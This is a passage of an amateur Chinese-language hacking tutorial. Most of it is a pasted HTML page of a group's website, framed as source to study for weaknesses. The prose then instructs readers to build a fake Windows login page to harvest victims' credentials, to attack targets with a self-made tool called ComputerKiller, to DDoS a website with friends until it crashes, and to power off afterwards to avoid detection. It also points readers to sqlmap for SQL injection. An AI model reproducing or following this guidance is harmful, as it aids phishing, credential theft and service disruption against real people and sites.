// https://www.w3schools.com/howto/howto_css_smooth_scroll.asp
$("a").on('click', function(event) {
if (this.hash !== "") {
event.preventDefault();
var hash = this.hash;
$('html, body').animate({
scrollTop: $(hash).offset().top
}, 400, function(){
window.location.hash = hash;
});
} // End if
});
// Pop up
$('.tm-gallery').magnificPopup({
delegate: 'a',
type: 'image',
gallery: { enabled: true }
});
// Gallery
$('.tm-gallery').slick({
dots: true,
infinite: false,
slidesToShow: 5,
slidesToScroll: 2,
responsive: [
{
breakpoint: 1199,
settings: {
slidesToShow: 4,
slidesToScroll: 2
}
},
{
breakpoint: 991,
settings: {
slidesToShow: 3,
slidesToScroll: 2
}
},
{
breakpoint: 767,
settings: {
slidesToShow: 2,
slidesToScroll: 1
}
},
{
breakpoint: 480,
settings: {
slidesToShow: 1,
slidesToScroll: 1
}
}
]
});
});
</script>
</body>
</html>
我们知道源码后,即可进行分析,也就可以找到对方的漏洞了。
中级篇
在这一篇里,我们将进行更深入的学习。
网页分析
Python这个语言通俗易懂,并且还很强大。在上一篇,我们学习了如何进行网页源码的获取,这一节,我们来学习如何分析弱点。
首先,我们再用Python脚本来获取秦川联盟的脚本:
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<!-- Verifications -->
<meta name="baidu-site-verification" content="lw65VVjI6w" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="msvalidate.01" content="2D76DBA9C0B07B52C5A4E01E9C544670" />
<meta name="360-site-verification" content="f2b92e1ed29f39bd884ee129cccee90c" />
<meta name='keywords' content="中国秦川联盟,秦川联盟">
<meta name=description content="中国秦川联盟是一个综合性组织,批准创建了中国晨风社和雨墨局等组织。我们已经和天狼队、米兔联盟、红龙网络安全组织、FREET安全组和萤火虫网安等组织建立合作关系。" >
<link rel="shortcut icon" href="./static/favicon.ico" />
<title>中国秦川联盟</title>
<meta name="google-site-verification" content="Z7G5Ye7l4HdXD3LNZgM64B2l6DxoF0nyOu6myi858yQ" />
<meta name="shenma-site-verification" content="1fee56e1e4a8da6977eb295b4387a8a4_1566456372">
<meta name="sogou_site_verification" content="L8vKDp4Gys"/>
<link rel="stylesheet" href="./static/fontawesome-5.5/css/all.min.css" />
<link rel="stylesheet" href="./static/slick/slick.css">
<link rel="stylesheet" href="./static/slick/slick-theme.css">
<link rel="stylesheet" href="./static/magnific-popup/magnific-popup.css">
<link rel="stylesheet" href="./static/css/bootstrap.min.css" />
<link rel="stylesheet" href="./static/css/templatemo-style.css" />
<script>
if(window.location.host!="www.qinnational.xyz"){ redirect = "https://www.qinnational.xyz"+location.pathname; window.location = redirect; }
</script>
<script>
(function(){
var src = "https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba";
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
</script>
<script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
</head>
<body>
<!-- Hero section -->
<style>
.declare-wrap {
margin-top: -30px;
background: #fff;
display: none;
}
.declare {
background: #f9f4d9;
color: #8f7f5d;
padding: 10px 15px;
position: relative;
*zoom: 1;
</style>
<section id="hero" class="text-white tm-font-big tm-parallax">
<!-- Navigation -->
<nav class="navbar navbar-expand-md tm-navbar" id="tmNav">
<div class="container">
<div class="tm-next"><a href="#hero" class="navbar-brand">QUC</a></div>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<i class="fas fa-bars navbar-toggler-icon"></i>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav ml-auto">
<li class="nav-item"> <a class="nav-link tm-nav-link" href="#introduction">关于</a> </li>
<li class="nav-item"> <a class="nav-link tm-nav-link" href="#work">解决方案</a> </li>
<li class="nav-item">
<a class="nav-link tm-nav-link" href="#contact">联系我们</a>
</li>
</ul>
</div>
</div>
</nav>
<div class="text-center tm-hero-text-container">
<div class="tm-hero-text-container-inner">
<h2 class="tm-hero-title">中国秦川联盟</h2>
<p class="tm-hero-subtitle">
Qinchuan Union of China
</p>
</div>
</div>
<div class="tm-next tm-intro-next">
<a href="#introduction" class="text-center tm-down-arrow-link">
<i class="fas fa-3x fa-caret-down tm-down-arrow"></i>
</a>
</div>
</section>
<script>
host = window.location.host;
if(host=='fu050409.gitee.io'){
document.write("<br><br><div class='declare-wrap' id='J-declare-wrap' style='display: block;'><div class='declare' id='J-declare'>注意:本站是由于百度无法收录主站而搭建,同步定期,但万一站长夏侯启懒一懒,就会忘记更新副站,最新内容详见<a class='declare-details' target='_blank' href='https://www.qinchuan.tk'>主站>></a><div class='close-btn' id='J-declare-close'><em class='cmn-icon cmn-icons cmn-icons_close'></em></div></div></div><br><br>")
}
var u = navigator.userAgent;
//Android终端
var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Adr') > -1;
//iOS终端
var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
if(isiOS){
//如果为iOS
document.write("<br><br><div class='declare-wrap' id='J-declare-wrap' style='display: block;'><div class='declare' id='J-declare'>注意:由于iOS屏蔽了一些插件,我们将在近期内结束对iOS系统的支持!请尽快更换安卓手机!<a class='declare-details' target='_blank' href='https://www.vmall.com/product/10086102942203.html'>华为P30购买>></a><div class='close-btn' id='J-declare-close'><em class='cmn-icon cmn-icons cmn-icons_close'></em></div></div></div><br><br>")
}
</script>
<section id="introduction" class="tm-section-pad-top">
<div class="container">
<div class="row">
<!--<div class="col-lg-6">
<img src="" alt="Image" class="img-fluid tm-intro-img" />
</div>-->
<div class="col-lg-6">
<div class="tm-intro-text-container">
<h2 class="tm-text-primary mb-4 tm-section-title">关于秦川联盟</h2>
<p class="mb-4 tm-intro-text">中国秦川联盟是一个大型综合性学术团体,包含有文学、数学、网络技术等多个方面。于2011年9月1日由夏侯启(代名)、子墨(简名)、李源(代名)等中国秦川联盟早期盟员在中华人民共和国陕西省西安市蓝田县创建。
2017年,首次提出了科技共产战略部署;2019年10月,由龙启发表了<a href="file/scholarly_program.html">《中国秦川联盟学术纲领》</a>,提出了学术支援战略、学术垄断战略、学术驱动发展战略等三大学术战略。
我们批准创建了中国晨风社、<a href="https://ym.agency.qinnational.xyz" id="ymiblink">雨墨情报局</a>、中国红云局等组织。
我们已经和天狼队、米兔联盟、<a href="http://hugozz.net3v.net">红龙网络安全组织</a>、<a href="https://www.freet.tk">Freet安全组</a>、<a href="https://firefliestudio.com">萤火虫网安</a>、<a href='http://gw.qlwltd.site'>QL网络团队</a>等组织建立学术合作关系。<br>
</p>
<div class="tm-next">
<a href="./static/announcement.html" class="tm-intro-text tm-btn-primary">公告</a>
</div>
</div>
</div>
</div>
<div class="row tm-section-pad-top">
<div class="col-lg-4">
<h4 class="text-center tm-text-primary mb-4">合作组织</h4>
<p>
中国天狼队<br>
萤火虫网安(FireFlies’ Studio)<br>
中国米兔联盟<br>
红龙网络安全组织<br>
FREET安全组<br>
QL网络安全团队<br>
</p>
</div>
<div class="col-lg-4 mt-5 mt-lg-0">
<h4 class="text-center tm-text-primary mb-4">批准创建</h4>
<p>
<h5><strong>中国红云局</strong></h5><br>
<small>2014 年 9月 - 创建</small><br>
中国秦川联盟批准创建的一支强大的青年社会工程队伍,是大量社会工程师的聚集地,为中国秦川联盟各项任务辅助。
<br><br />
<h6><strong>发展历史</strong></h6>
<small>2014年中旬,中国盟派(后更名为地球秦川联盟)为了应对中国青龙帮,总部委员会会议决定批准创立中国云特种谍战部队;
<br>
2017年,正式更名为中国云特编局(CnC,ChinaCloud);
<br>
2018年9月21日,地球秦川联盟由于“921齐天泽事件”解体,中国云特编局被迫宣布独立,并持续试图重组地球秦川联盟;
<br>
2018年10月7日,地球秦川联盟重组,更名为中国秦川联盟;
<br>
2019年5月,中国云特编局更名为中国红云局(RCB,RedCloudBureau)。
</small></p>
<p>
<h5><strong>雨墨情报局</strong></h5><br>
<small>2017年2月22日 - 创建</small><br />
中国秦川联盟主要学术思想研究并挂有情报收录之名的组织,是各类天才的聚集地。
<br><br />
<h6><strong>发展历史</strong></h6>
<small>2017年2月2日,由地球秦川联盟批准创建“明镜三阁”——雨墨阁、晨诚阁、子龙阁,直属于地球秦川联盟。2018年2月2日正式完善开始运营。
<br>
后来,由于2018年9月21日“921齐天泽”事件,地球秦川联盟解体,明镜三阁合并为雨墨情报局,宣布独立。
<br>
2018年10月7日,地球秦川联盟重组,更名为中国秦川联盟,雨墨情报局和中国秦川联盟加盟。
<br></small>
</p>
</div>
<div class="col-lg-4 mt-5 mt-lg-0">
<h4 class="text-center tm-text-primary mb-4">直属分部</h4>
<p>
<a href='https://mns.qinnational.xyz'>中国秦川联盟网络安全部</a><br>
<a href='https://ym.agency.qinnational.xyz'>雨墨情报局</a>
</p>
<p>太多,懒得敲。</p>
</div>
</div>
</section>
<section id="work" class="tm-section-pad-top">
<div class="container tm-container-gallery">
<div class="row">
<div class="text-center col-12">
<h2 class="tm-text-primary tm-section-title mb-4">我们的工作</h2>
<p class="mx-auto tm-work-description"> 点击下方以查看我们提供的解决方案,迅速、高效,更值得信赖! <br>
</p>
<a href="static/solve.html" class="tm-intro-text tm-btn-primary">解决方案</a>
</div>
</div>
<div class="row">
<div class="col-12"> <br><br></div>
</div>
</div>
</section>
<section id="work" class="tm-section-pad-top">
<div class="container tm-container-gallery">
<div class="row">
<div class="text-center col-12">
<h2 class="tm-text-primary tm-section-title mb-4">行动规划</h2>
<p class="mx-auto tm-work-description">中国秦川联盟行动规划一览表<br>
</p>
<a href="./project.html" class="tm-intro-text tm-btn-primary">行动规划</a>
</div>
</div>
<div class="row">
<div class="col-12"> <br><br></div>
</div>
</div>
</section>
<!-- Contact -->
<section id="contact" class="tm-section-pad-top tm-parallax-2">
<div class="container tm-container-contact">
<div class="row">
<div class="col-12">
<h2 class="mb-4 tm-section-title">联系我们</h2>
<div class="mb-5 tm-underline">
<div class="tm-underline-inner"></div>
</div>
<p class="mb-5">post@qinnational.xyz是中国秦川联盟对外的官方邮箱,如果您收到其他不是以@qinchuan.tk、@qucmail.tk、@qinchuanunion.tk结尾的邮箱,均不是我们的邮箱,请不要上当受骗!</p>
</div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item"><a href="tel:110" class="tm-contact-item-link"> <i class="fas fa-3x fa-phone mr-4"></i> <span class="mb-0">绝密!(点击后会有出乎意料的效果)</span> </a></div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item">
<a href="mailto:[email protected]" class="tm-contact-item-link">
<i class="fas fa-3x fa-envelope mr-4"></i>
<span class="mb-0"><!--<span class="__cf_email__" data-cfemail="85f5eaf6f1c5f4f0e6e8e4ece9abf1ee">[email protected]</span>-->中国秦川联盟官方邮箱</span>
</a>
</div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item"><a href="#" class="tm-contact-item-link"> <i class="fas fa-3x fa-map-marker-alt mr-4"></i> <span class="mb-0">地图上的位置</span></a></div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item">
<form action="" method="get">
</form>
</div>
</div>
</div>
<footer class="text-center small tm-footer">
<p class="mb-0">©2011~2019 - QINCHUAN UNION OF CHINA<br>
</p>
<p class='mb-0'><a href='static/links.html'>友情链接</a> | <a href="file/constitution.html">章程</a> | <a href="project.html">行动规划</a></p>
</footer>
</section>
<script src="./static/js/jquery-1.9.1.min.js"></script>
<script src="./static/slick/slick.min.js"></script>
<script src="./static/magnific-popup/jquery.magnific-popup.min.js"></script>
<script src="./static/js/jquery.singlePageNav.min.js"></script>
<script src="./static/js/bootstrap.min.js"></script>
<script>
function getOffSet(){
var _offset = 450;
var windowHeight = window.innerHeight;
if(windowHeight > 500) {
_offset = 400;
}
if(windowHeight > 680) {
_offset = 300
}
if(windowHeight > 830) {
_offset = 210;
}
return _offset;
}
function setParallaxPosition($doc, multiplier, $object){
var offset = getOffSet();
var from_top = $doc.scrollTop(),
bg_css = 'center ' +(multiplier * from_top - offset) + 'px';
$object.css({"background-position" : bg_css });
}
var background_image_parallax = function($object, multiplier, forceSet){
multiplier = typeof multiplier !== 'undefined' ? multiplier : 0.5;
multiplier = 1 - multiplier;
var $doc = $(document);
// $object.css({"background-attatchment" : "fixed"});
if(forceSet) {
setParallaxPosition($doc, multiplier, $object);
} else {
$(window).scroll(function(){
setParallaxPosition($doc, multiplier, $object);
});
}
};
var background_image_parallax_2 = function($object, multiplier){
multiplier = typeof multiplier !== 'undefined' ? multiplier : 0.5;
multiplier = 1 - multiplier;
var $doc = $(document);
$object.css({"background-attachment" : "fixed"});
$(window).scroll(function(){
var firstTop = $object.offset().top,
pos = $(window).scrollTop(),
yPos = Math.round((multiplier * (firstTop - pos)) - 186);
var bg_css = 'center ' + yPos + 'px';
$object.css({"background-position" : bg_css });
});
};
$(function(){
// Hero Section - Background Parallax
background_image_parallax($(".tm-parallax"), 0.30, false);
background_image_parallax_2($("#contact"), 0.80);
// Handle window resize
window.addEventListener('resize', function(){
background_image_parallax($(".tm-parallax"), 0.30, true);
}, true);
// Detect window scroll and update navbar
$(window).scroll(function(e){
if($(document).scrollTop() > 120) {
$('.tm-navbar').addClass("scroll");
} else {
$('.tm-navbar').removeClass("scroll");
}
});
// Close mobile menu after click
$('#tmNav a').on('click', function(){
$('.navbar-collapse').removeClass('show');
})
// Scroll to corresponding section with animation
$('#tmNav').singlePageNav();
// Add smooth scrolling to all links
// https://www.w3schools.com/howto/howto_css_smooth_scroll.asp
$("a").on('click', function(event) {
if (this.hash !== "") {
event.preventDefault();
var hash = this.hash;
$('html, body').animate({
scrollTop: $(hash).offset().top
}, 400, function(){
window.location.hash = hash;
});
} // End if
});
// Pop up
$('.tm-gallery').magnificPopup({
delegate: 'a',
type: 'image',
gallery: { enabled: true }
});
// Gallery
$('.tm-gallery').slick({
dots: true,
infinite: false,
slidesToShow: 5,
slidesToScroll: 2,
responsive: [
{
breakpoint: 1199,
settings: {
slidesToShow: 4,
slidesToScroll: 2
}
},
{
breakpoint: 991,
settings: {
slidesToShow: 3,
slidesToScroll: 2
}
},
{
breakpoint: 767,
settings: {
slidesToShow: 2,
slidesToScroll: 1
}
},
{
breakpoint: 480,
settings: {
slidesToShow: 1,
slidesToScroll: 1
}
}
]
});
});
</script>
</body>
</html>
我们通过阅读,发现一些源码的用途:
<html>#网站的开始
</html>#网站结束
......
接着,我们可以打开这个网站,并且右击网格,点击检查,打开如下界面:
我们看到了网页的客户端源码(不完整的源码),是不是量比我们用Python弄到的少多了?
接着,我们来通过这个功能来进行网页分析。
我们移到哪行代码,就会有一段地方编程灰色,说明这行代码就是这个功能的代码脚本。
我们用这个功能进行熟悉,即可得到大致代码内容的意思和用途。
运用凡科建站的产品搭建恶意网站
在本章,我们又要和凡科建站见面了。在之前已做过大致掩饰,在这里就不做了。
1、诱骗网站
进行凡科建站,继续创建一个新的网页,名字叫Windows账户登录。接着,自己进行学习,完成网站到以下界面:
这样,我们就可以诱骗用户输入自己的用户名和密码,我们就可以在表单提交里看到它们的用户名和密码了!
恶意程序下载网站
此网站在上本书中已经说明,在这里不再复述。
运用ComputerKiller进行攻击
ComputerKiller是我们在上一本书中下载的黑客软件,这个软件功能强大,是很好的一个软件。
它是由命令行(终端)模式进行运行的,所以外貌很简陋。但是,它的威力可以算是绰绰有余!
(注:此软件是我做的)
我们打开ComputerKiller1.9.3,界面如下:
接着,我们输入对方IP或网址,看看效果,随着程序走吧!
到最后,会让你选择攻击方式:
选择一个攻击方式,等待最终结果即可。
实战篇
在本章内,我们将进行实战,攻击一个网站。
推荐大家找一些旧网站练手,因为凡科的网站保护太高级,我们根本无法对它起作用。
第一步:获取源码
我们先获取网页的源码,来进行参考。
我选择的是百度做示例,大家不要尝试,以免发生事故。
我先扫一下百度的源码:
<html>
<head>
<script>
location.replace(location.href.replace("https://","http://"));
</script>
</head>
<body>
<noscript><meta http-equiv="refresh" content="0;url=http://www.baidu.com/"></noscript>
</body>
</html>
这个就是百度的源码,是不是很简单?但是,其实这个只是主页的源码,还有好多分系统呢!
我们获取源码后,再用检查功能进行检查:
我们对网页又有了新的认识,可以更好的进行攻击。
第二步:进行DDoS攻击
结合几个朋友或同事,进行DDoS攻击。(记住,用改良的攻击脚本)
攻击一段时间后,即可查看结果,如果还没有崩溃,那就继续攻击。
第三步:收拾干净,走人
停止你的攻击,并且将计算机关机,防止被发现。
附录
附录A
访问http://sqlmap.org/,下载此黑客软件。
sqlmap是专为Python提供的黑客软件,运用它,可以实现SQL注入等攻击。
在下本书,我们将教大家使用此软件!
附录B
在本书中,我们使用代码来获取源代码,那么,有没有更简单的方法呢?有。
打开浏览器,点击下载,新建下载,照下方输入:
这样,我们就获取了百度的“Login”源码,这种方法虽然简单,但也有不足之处,就是必须要知道这个网页的源码名称才可以。而与代码相比,代码又有一个不足之处,就是如果网站开了高级防扫描,就无法对它进行扫描了。
结束
非常棒!你的水平又长进了不少!希望你能在后面的学习中,势如破竹!
希望你继续阅读我的其他书籍和博客,可能可以给你一些灵感!
再见!
